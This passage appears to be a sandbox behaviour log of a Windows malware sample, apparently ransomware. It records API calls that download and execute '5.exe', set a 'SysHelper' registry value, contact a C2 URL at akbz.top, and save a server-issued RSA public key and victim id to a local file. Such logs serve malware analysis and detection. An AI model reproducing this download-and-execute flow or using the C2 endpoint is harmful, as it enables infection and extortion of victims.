hFile=0xcc0030, lpBuffer=0x9a0d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a0d6d8 | out: lpBuffer=0x9a0d778*, lpdwNumberOfBytesRead=0x9a0d6d8*=0x2800) returned 1 [0130.763] WriteFile (in: hFile=0x6f0, lpBuffer=0x9a0d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a0d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a0d778*, lpNumberOfBytesWritten=0x9a0d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0130.763] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9a0d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a0d6d8 | out: lpBuffer=0x9a0d778*, lpdwNumberOfBytesRead=0x9a0d6d8*=0x2800) returned 1 [0130.764] WriteFile (in: hFile=0x6f0, lpBuffer=0x9a0d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a0d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a0d778*, lpNumberOfBytesWritten=0x9a0d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0130.764] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9a0d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a0d6d8 | out: lpBuffer=0x9a0d778*, lpdwNumberOfBytesRead=0x9a0d6d8*=0x2800) returned 1 [0130.764] WriteFile (in: hFile=0x6f0, lpBuffer=0x9a0d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a0d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a0d778*, lpNumberOfBytesWritten=0x9a0d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0130.764] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9a0d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a0d6d8 | out: lpBuffer=0x9a0d778*, lpdwNumberOfBytesRead=0x9a0d6d8*=0x2800) returned 1 [0130.765] WriteFile (in: hFile=0x6f0, lpBuffer=0x9a0d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a0d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a0d778*, lpNumberOfBytesWritten=0x9a0d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0130.765] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9a0d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a0d6d8 | out: lpBuffer=0x9a0d778*, lpdwNumberOfBytesRead=0x9a0d6d8*=0x2800) returned 1 [0130.765] WriteFile (in: hFile=0x6f0, lpBuffer=0x9a0d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a0d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a0d778*, lpNumberOfBytesWritten=0x9a0d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0130.766] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9a0d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a0d6d8 | out: lpBuffer=0x9a0d778*, lpdwNumberOfBytesRead=0x9a0d6d8*=0x2800) returned 1 [0130.766] WriteFile (in: hFile=0x6f0, lpBuffer=0x9a0d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a0d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a0d778*, lpNumberOfBytesWritten=0x9a0d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0130.766] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9a0d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a0d6d8 | out: lpBuffer=0x9a0d778*, lpdwNumberOfBytesRead=0x9a0d6d8*=0xe00) returned 1 [0130.767] WriteFile (in: hFile=0x6f0, lpBuffer=0x9a0d778*, nNumberOfBytesToWrite=0xe00, lpNumberOfBytesWritten=0x9a0d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a0d778*, lpNumberOfBytesWritten=0x9a0d6dc*=0xe00, lpOverlapped=0x0) returned 1 [0130.767] CloseHandle (hObject=0x6f0) returned 1 [0130.773] InternetCloseHandle (hInternet=0xcc0030) returned 1 [0130.781] InternetCloseHandle (hInternet=0xcc0028) returned 1 [0130.781] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f2685878-c1d9-47fc-b7a6-e4dee8a92594\\5.exe", lpParameters=0x0, lpDirectory=0x0, nShowCmd=1) returned 0x2a [0131.160] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325af48 | out: hHeap=0x620000) returned 1 [0131.160] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3290eb8 | out: hHeap=0x620000) returned 1 [0131.160] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321ea30 | out: hHeap=0x620000) returned 1 [0131.160] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x320f7a0 | out: hHeap=0x620000) returned 1 [0131.160] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321e628 | out: hHeap=0x620000) returned 1 [0131.160] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3222eb0 | out: hHeap=0x620000) returned 1 [0131.160] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3222ef8 | out: hHeap=0x620000) returned 1 [0131.160] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x320f880 | out: hHeap=0x620000) returned 1 [0131.160] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x320fa78 | out: hHeap=0x620000) returned 1 [0131.160] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x320f810 | out: hHeap=0x620000) returned 1 [0131.160] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x320f6c0 | out: hHeap=0x620000) returned 1 [0131.160] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e108 | out: hHeap=0x620000) returned 1 [0131.160] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x31ec580 | out: hHeap=0x620000) returned 1 [0131.161] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321e260 | out: hHeap=0x620000) returned 1 Thread: id = 85 os_tid = 0x8ec [0122.962] timeGetTime () returned 0x115403c [0122.962] GetLastError () returned 0x54f [0122.962] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x3bc) returned 0x321f218 [0122.962] GetCurrentThreadId () returned 0x8ec [0122.962] SetLastError (dwErrCode=0x54f) [0122.962] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", ulOptions=0x0, samDesired=0xf003f, phkResult=0xfc0a5e4 | out: phkResult=0xfc0a5e4*=0x5d0) returned 0x0 [0122.963] RegQueryValueExW (in: hKey=0x5d0, lpValueName="SysHelper", lpReserved=0x0, lpType=0xfc0a5d8, lpData=0xfc0a5e0, lpcbData=0xfc0a5dc*=0x4 | out: lpType=0xfc0a5d8*=0x0, lpData=0xfc0a5e0*=0x0, lpcbData=0xfc0a5dc*=0x4) returned 0x2 [0122.963] RegSetValueExW (in: hKey=0x5d0, lpValueName="SysHelper", Reserved=0x0, dwType=0x4, lpData=0xfc0a5e0*=0x1, cbData=0x4 | out: lpData=0xfc0a5e0*=0x1) returned 0x0 [0122.963] RegCloseKey (hKey=0x5d0) returned 0x0 [0122.963] SHGetFolderPathA (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0xfc0a4e4 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x0 [0122.963] PathAppendA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", pMore="bowsakkdestx.txt" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt") returned 1 [0122.964] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x31fd1c0 [0122.964] AreFileApisANSI () returned 1 [0122.964] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xfc0a4e4, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 61 [0122.964] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7a) returned 0x680f68 [0122.965] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xfc0a4e4, cbMultiByte=-1, lpWideCharStr=0x680f68, cchWideChar=61 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt") returned 61 [0122.974] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\bowsakkdestx.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xfc0a368, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0123.049] GetLastError () returned 0x2 [0123.049] GetLastError () returned 0x2 [0123.049] SetLastError (dwErrCode=0x2) [0123.049] GetLastError () returned 0x2 [0123.049] SetLastError (dwErrCode=0x2) [0123.049] GetLastError () returned 0x2 [0123.049] SetLastError (dwErrCode=0x2) [0123.078] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x680f68 | out: hHeap=0x620000) returned 1 [0123.078] InternetOpenW (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0010 [0123.078] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x6ff348 [0123.078] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8e) returned 0x64e368 [0123.078] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6ff348 | out: hHeap=0x620000) returned 1 [0123.078] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x320fa08 [0123.078] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3218938 [0123.079] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x320fa08, cbMultiByte=-1, lpWideCharStr=0x3218938, cchWideChar=1056 | out: lpWideCharStr="7E227702037139ADC1BDF7020DB500BA") returned 33 [0123.079] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x3219180 [0123.079] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3218938 | out: hHeap=0x620000) returned 1 [0123.079] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x320fa08 | out: hHeap=0x620000) returned 1 [0123.079] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8b0) returned 0x32199d8 [0123.079] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e368 | out: hHeap=0x620000) returned 1 [0123.079] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3219180 | out: hHeap=0x620000) returned 1 [0123.079] lstrcpyW (in: lpString1=0xfc0af78, lpString2="http://akbz.top/ydtftysdtyftysdfsdpen3/get.php?pid=7E227702037139ADC1BDF7020DB500BA" | out: lpString1="http://akbz.top/ydtftysdtyftysdfsdpen3/get.php?pid=7E227702037139ADC1BDF7020DB500BA") returned="http://akbz.top/ydtftysdtyftysdfsdpen3/get.php?pid=7E227702037139ADC1BDF7020DB500BA" [0123.079] lstrcatW (in: lpString1="http://akbz.top/ydtftysdtyftysdfsdpen3/get.php?pid=7E227702037139ADC1BDF7020DB500BA", lpString2="&first=true" | out: lpString1="http://akbz.top/ydtftysdtyftysdfsdpen3/get.php?pid=7E227702037139ADC1BDF7020DB500BA&first=true") returned="http://akbz.top/ydtftysdtyftysdfsdpen3/get.php?pid=7E227702037139ADC1BDF7020DB500BA&first=true" [0123.079] InternetOpenUrlW (hInternet=0xcc0010, lpszUrl="http://akbz.top/ydtftysdtyftysdfsdpen3/get.php?pid=7E227702037139ADC1BDF7020DB500BA&first=true", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc0018 [0123.432] InternetReadFile (in: hFile=0xcc0018, lpBuffer=0xfc0a778, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xfc0a604 | out: lpBuffer=0xfc0a778*, lpdwNumberOfBytesRead=0xfc0a604*=0x230) returned 1 [0123.433] SHGetFolderPathA (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0xfc0a670 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x0 [0123.433] PathAppendA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", pMore="bowsakkdestx.txt" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt") returned 1 [0123.434] AreFileApisANSI () returned 1 [0123.434] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xfc0a670, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 61 [0123.434] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7a) returned 0x6803b8 [0123.434] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xfc0a670, cbMultiByte=-1, lpWideCharStr=0x6803b8, cchWideChar=61 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt") returned 61 [0123.434] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\bowsakkdestx.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0xfc0a47c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3b4 [0123.435] GetFileType (hFile=0x3b4) returned 0x1 [0123.435] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6803b8 | out: hHeap=0x620000) returned 1 [0123.435] lstrlenA (lpString="{\"public_key\":\"-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuS\\/uEwpTF9K5knH4GbCD\\\\nNaStMcirWtNLwc1IbSIfYXbwfli6D44yIspAZMar+wotlh6KKYWNifwh8kHWr84b\\\\nOfqYirep9DvZMmAwGFTmgG2GwOV8hFJSpXGzlzY15D4jRTtuxZBiox7p+8nNHShm\\\\n1w1Mx1fsqICoKte18dzQ3C714H\\/WmGGmwVNp\\/56V2CYVFMB4JsRnUzxYEBLWly6Q\\\\n65F4PyfqcY3af5ibMbUVeE6AOTnpoqo12nXcY\\/X9zd07tctrIXIm+2ABmtxWckAz\\\\nkKDXfdWboqP\\/isn1NFKVmh7NfyWvZhb7+w28\\/xr+G1udzTk6xWXT2lrbwLp7MxyK\\\\nqwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 560 [0123.435] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1000) returned 0x321c290 [0123.435] WriteFile (in: hFile=0x3b4, lpBuffer=0xfc09118*, nNumberOfBytesToWrite=0x230, lpNumberOfBytesWritten=0xfc08a44, lpOverlapped=0x0 | out: lpBuffer=0xfc09118*, lpNumberOfBytesWritten=0xfc08a44*=0x230, lpOverlapped=0x0) returned 1 [0123.436] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321c290 | out: hHeap=0x620000) returned 1 [0123.436] CloseHandle (hObject=0x3b4) returned 1 [0123.449] InternetCloseHandle (hInternet=0xcc0018) returned 1 [0123.451] InternetCloseHandle (hInternet=0xcc0010) returned 1 [0123.451] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32199d8 | out: hHeap=0x620000) returned 1 [0123.451] lstrlenA (lpString="{\"public_key\":\"") returned 15 [0123.451] lstrcpyA (in: lpString1=0xfc0ab78, lpString2="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuS\\/uEwpTF9K5knH4GbCD\\\\nNaStMcirWtNLwc1IbSIfYXbwfli6D44yIspAZMar+wotlh6KKYWNifwh8kHWr84b\\\\nOfqYirep9DvZMmAwGFTmgG2GwOV8hFJSpXGzlzY15D4jRTtuxZBiox7p+8nNHShm\\\\n1w1Mx1fsqICoKte18dzQ3C714H\\/WmGGmwVNp\\/56V2CYVFMB4JsRnUzxYEBLWly6Q\\\\n65F4PyfqcY3af5ibMbUVeE6AOTnpoqo12nXcY\\/X9zd07tctrIXIm+2ABmtxWckAz\\\\nkKDXfdWboqP\\/isn1NFKVmh7NfyWvZhb7+w28\\/xr+G1udzTk6xWXT2lrbwLp7MxyK\\\\nqwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}" | out: lpString1="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuS\\/uEwpTF9K5knH4GbCD\\\\nNaStMcirWtNLwc1IbSIfYXbwfli6D44yIspAZMar+wotlh6KKYWNifwh8kHWr84b\\\\nOfqYirep9DvZMmAwGFTmgG2GwOV8hFJSpXGzlzY15D4jRTtuxZBiox7p+8nNHShm\\\\n1w1Mx1fsqICoKte18dzQ3C714H\\/WmGGmwVNp\\/56V2CYVFMB4JsRnUzxYEBLWly6Q\\\\n65F4PyfqcY3af5ibMbUVeE6AOTnpoqo12nXcY\\/X9zd07tctrIXIm+2ABmtxWckAz\\\\nkKDXfdWboqP\\/isn1NFKVmh7NfyWvZhb7+w28\\/xr+G1udzTk6xWXT2lrbwLp7MxyK\\\\nqwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuS\\/uEwpTF9K5knH4GbCD\\\\nNaStMcirWtNLwc1IbSIfYXbwfli6D44yIspAZMar+wotlh6KKYWNifwh8kHWr84b\\\\nOfqYirep9DvZMmAwGFTmgG2GwOV8hFJSpXGzlzY15D4jRTtuxZBiox7p+8nNHShm\\\\n1w1Mx1fsqICoKte18dzQ3C714H\\/WmGGmwVNp\\/56V2CYVFMB4JsRnUzxYEBLWly6Q\\\\n65F4PyfqcY3af5ibMbUVeE6AOTnpoqo12nXcY\\/X9zd07tctrIXIm+2ABmtxWckAz\\\\nkKDXfdWboqP\\/isn1NFKVmh7NfyWvZhb7+w28\\/xr+G1udzTk6xWXT2lrbwLp7MxyK\\\\nqwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}" [0123.451] lstrcpyA (in: lpString1=0xfc0a778, lpString2="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuS\\/uEwpTF9K5knH4GbCD\\\\nNaStMcirWtNLwc1IbSIfYXbwfli6D44yIspAZMar+wotlh6KKYWNifwh8kHWr84b\\\\nOfqYirep9DvZMmAwGFTmgG2GwOV8hFJSpXGzlzY15D4jRTtuxZBiox7p+8nNHShm\\\\n1w1Mx1fsqICoKte18dzQ3C714H\\/WmGGmwVNp\\/56V2CYVFMB4JsRnUzxYEBLWly6Q\\\\n65F4PyfqcY3af5ibMbUVeE6AOTnpoqo12nXcY\\/X9zd07tctrIXIm+2ABmtxWckAz\\\\nkKDXfdWboqP\\/isn1NFKVmh7NfyWvZhb7+w28\\/xr+G1udzTk6xWXT2lrbwLp7MxyK\\\\nqwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}" | out: lpString1="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuS\\/uEwpTF9K5knH4GbCD\\\\nNaStMcirWtNLwc1IbSIfYXbwfli6D44yIspAZMar+wotlh6KKYWNifwh8kHWr84b\\\\nOfqYirep9DvZMmAwGFTmgG2GwOV8hFJSpXGzlzY15D4jRTtuxZBiox7p+8nNHShm\\\\n1w1Mx1fsqICoKte18dzQ3C714H\\/WmGGmwVNp\\/56V2CYVFMB4JsRnUzxYEBLWly6Q\\\\n65F4PyfqcY3af5ibMbUVeE6AOTnpoqo12nXcY\\/X9zd07tctrIXIm+2ABmtxWckAz\\\\nkKDXfdWboqP\\/isn1NFKVmh7NfyWvZhb7+w28\\/xr+G1udzTk6xWXT2lrbwLp7MxyK\\\\nqwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuS\\/uEwpTF9K5knH4GbCD\\\\nNaStMcirWtNLwc1IbSIfYXbwfli6D44yIspAZMar+wotlh6KKYWNifwh8kHWr84b\\\\nOfqYirep9DvZMmAwGFTmgG2GwOV8hFJSpXGzlzY15D4jRTtuxZBiox7p+8nNHShm\\\\n1w1Mx1fsqICoKte18dzQ3C714H\\/WmGGmwVNp\\/56V2CYVFMB4JsRnUzxYEBLWly6Q\\\\n65F4PyfqcY3af5ibMbUVeE6AOTnpoqo12nXcY\\/X9zd07tctrIXIm+2ABmtxWckAz\\\\nkKDXfdWboqP\\/isn1NFKVmh7NfyWvZhb7+w28\\/xr+G1udzTk6xWXT2lrbwLp7MxyK\\\\nqwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}" [0123.451] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuS\\/uEwpTF9K5knH4GbCD\\\\nNaStMcirWtNLwc1IbSIfYXbwfli6D44yIspAZMar+wotlh6KKYWNifwh8kHWr84b\\\\nOfqYirep9DvZMmAwGFTmgG2GwOV8hFJSpXGzlzY15D4jRTtuxZBiox7p+8nNHShm\\\\n1w1Mx1fsqICoKte18dzQ3C714H\\/WmGGmwVNp\\/56V2CYVFMB4JsRnUzxYEBLWly6Q\\\\n65F4PyfqcY3af5ibMbUVeE6AOTnpoqo12nXcY\\/X9zd07tctrIXIm+2ABmtxWckAz\\\\nkKDXfdWboqP\\/isn1NFKVmh7NfyWvZhb7+w28\\/xr+G1udzTk6xWXT2lrbwLp7MxyK\\\\nqwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 545 [0123.451] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuS\\/uEwpTF9K5knH4GbCD\\\\nNaStMcirWtNLwc1IbSIfYXbwfli6D44yIspAZMar+wotlh6KKYWNifwh8kHWr84b\\\\nOfqYirep9DvZMmAwGFTmgG2GwOV8hFJSpXGzlzY15D4jRTtuxZBiox7p+8nNHShm\\\\n1w1Mx1fsqICoKte18dzQ3C714H\\/WmGGmwVNp\\/56V2CYVFMB4JsRnUzxYEBLWly6Q\\\\n65F4PyfqcY3af5ibMbUVeE6AOTnpoqo12nXcY\\/X9zd07tctrIXIm+2ABmtxWckAz\\\\nkKDXfdWboqP\\/isn1NFKVmh7NfyWvZhb7+w28\\/xr+G1udzTk6xWXT2lrbwLp7MxyK\\\\nqwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 545 [0123.451] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuS\\/uEwpTF9K5knH4GbCD\\\\nNaStMcirWtNLwc1IbSIfYXbwfli6D44yIspAZMar+wotlh6KKYWNifwh8kHWr84b\\\\nOfqYirep9DvZMmAwGFTmgG2GwOV8hFJSpXGzlzY15D4jRTtuxZBiox7p+8nNHShm\\\\n1w1Mx1fsqICoKte18dzQ3C714H\\/WmGGmwVNp\\/56V2CYVFMB4JsRnUzxYEBLWly6Q\\\\n65F4PyfqcY3af5ibMbUVeE6AOTnpoqo12nXcY\\/X9zd07tctrIXIm+2ABmtxWckAz\\\\nkKDXfdWboqP\\/isn1NFKVmh7NfyWvZhb7+w28\\/xr+G1udzTk6xWXT2lrbwLp7MxyK\\\\nqwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 545 [0123.451] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuS\\/uEwpTF9K5knH4GbCD\\\\nNaStMcirWtNLwc1IbSIfYXbwfli6D44yIspAZMar+wotlh6KKYWNifwh8kHWr84b\\\\nOfqYirep9DvZMmAwGFTmgG2GwOV8hFJSpXGzlzY15D4jRTtuxZBiox7p+8nNHShm\\\\n1w1Mx1fsqICoKte18dzQ3C714H\\/WmGGmwVNp\\/56V2CYVFMB4JsRnUzxYEBLWly6Q\\\\n65F4PyfqcY3af5ibMbUVeE6AOTnpoqo12nXcY\\/X9zd07tctrIXIm+2ABmtxWckAz\\\\nkKDXfdWboqP\\/isn1NFKVmh7NfyWvZhb7+w28\\/xr+G1udzTk6xWXT2lrbwLp7MxyK\\\\nqwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 545 [0123.451] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuS\\/uEwpTF9K5knH4GbCD\\\\nNaStMcirWtNLwc1IbSIfYXbwfli6D44yIspAZMar+wotlh6KKYWNifwh8kHWr84b\\\\nOfqYirep9DvZMmAwGFTmgG2GwOV8hFJSpXGzlzY15D4jRTtuxZBiox7p+8nNHShm\\\\n1w1Mx1fsqICoKte18dzQ3C714H\\/WmGGmwVNp\\/56V2CYVFMB4JsRnUzxYEBLWly6Q\\\\n65F4PyfqcY3af5ibMbUVeE6AOTnpoqo12nXcY\\/X9zd07tctrIXIm+2ABmtxWckAz\\\\nkKDXfdWboqP\\/isn1NFKVmh7NfyWvZhb7+w28\\/xr+G1udzTk6xWXT2lrbwLp7MxyK\\\\nqwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 545 [0123.451] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuS\\/uEwpTF9K5knH4GbCD\\\\nNaStMcirWtNLwc1IbSIfYXbwfli6D44yIspAZMar+wotlh6KKYWNifwh8kHWr84b\\\\nOfqYirep9DvZMmAwGFTmgG2GwOV8hFJSpXGzlzY15D4jRTtuxZBiox7p+8nNHShm\\\\n1w1Mx1fsqICoKte18dzQ3C714H\\/WmGGmwVNp\\/56V2CYVFMB4JsRnUzxYEBLWly6Q\\\\n65F4PyfqcY3af5ibMbUVeE6AOTnpoqo12nXcY\\/X9zd07tctrIXIm+2ABmtxWckAz\\\\nkKDXfdWboqP\\/isn1NFKVmh7NfyWvZhb7+w28\\/xr+G1udzTk6xWXT2lrbwLp7MxyK\\\\nqwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 545 [0123.451] lstrlenA (lpString="-----BEGIN PUBLIC 